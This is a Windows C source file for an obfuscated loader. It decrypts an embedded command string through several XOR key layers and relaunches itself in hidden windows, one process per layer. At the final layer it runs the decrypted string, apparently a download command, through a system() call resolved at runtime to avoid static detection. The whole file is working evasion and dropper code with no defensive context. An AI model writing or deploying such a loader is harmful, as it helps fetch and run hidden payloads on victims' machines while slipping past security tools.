// onion.c
// Assumes keys.h and encrypted_url.h were generated by encrypt_url.py

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <windows.h>

#include "keys.h"
#include "encrypted_url.h"


#define MAX_PATH_LEN 260

int get_depth() {
    char *env = getenv("RECURSIVE_DEPTH");
    return env ? atoi(env) : 0;
}

void xor_decrypt(uint8_t *data, size_t data_len, const uint8_t *key, size_t key_len) {
    for (size_t i = 0; i < data_len; i++) {
        data[i] ^= key[i % key_len];
    }
}

void spawn_next(int next_depth, char *prog_path) {
    char env_val[16];
    snprintf(env_val, sizeof(env_val), "%d", next_depth);
    SetEnvironmentVariableA("RECURSIVE_DEPTH", env_val);

    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi;

    if (CreateProcessA(NULL, prog_path, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }
}

void run_command_download(const char *cmd) {
    HMODULE msvcrt = LoadLibraryA("msvcrt.dll");
    if (!msvcrt) return;
    int (*dyn_system)(const char *) = (int (*)(const char *))GetProcAddress(msvcrt, "system");
    if (!dyn_system) return;

    dyn_system(cmd);

    FreeLibrary(msvcrt);
}


int main() {
    int depth = get_depth();
    if (depth >= ROUNDS) return 0;

    uint8_t decrypted[URL_LEN];
    memcpy(decrypted, encrypted_url, URL_LEN);
    for (int i = 0; i <= depth; i++) {
        xor_decrypt(decrypted, URL_LEN, keys[i], KEY_LEN);
    }

    if (depth == ROUNDS - 1) {
        char output[URL_LEN + 1];
        memcpy(output, decrypted, URL_LEN);
        output[URL_LEN] = '\0';
        run_command_download(output);
    } else {
        char prog_path[MAX_PATH_LEN];
        GetModuleFileNameA(NULL, prog_path, MAX_PATH_LEN);
        spawn_next(depth + 1, prog_path);
    }
    return 0;
}
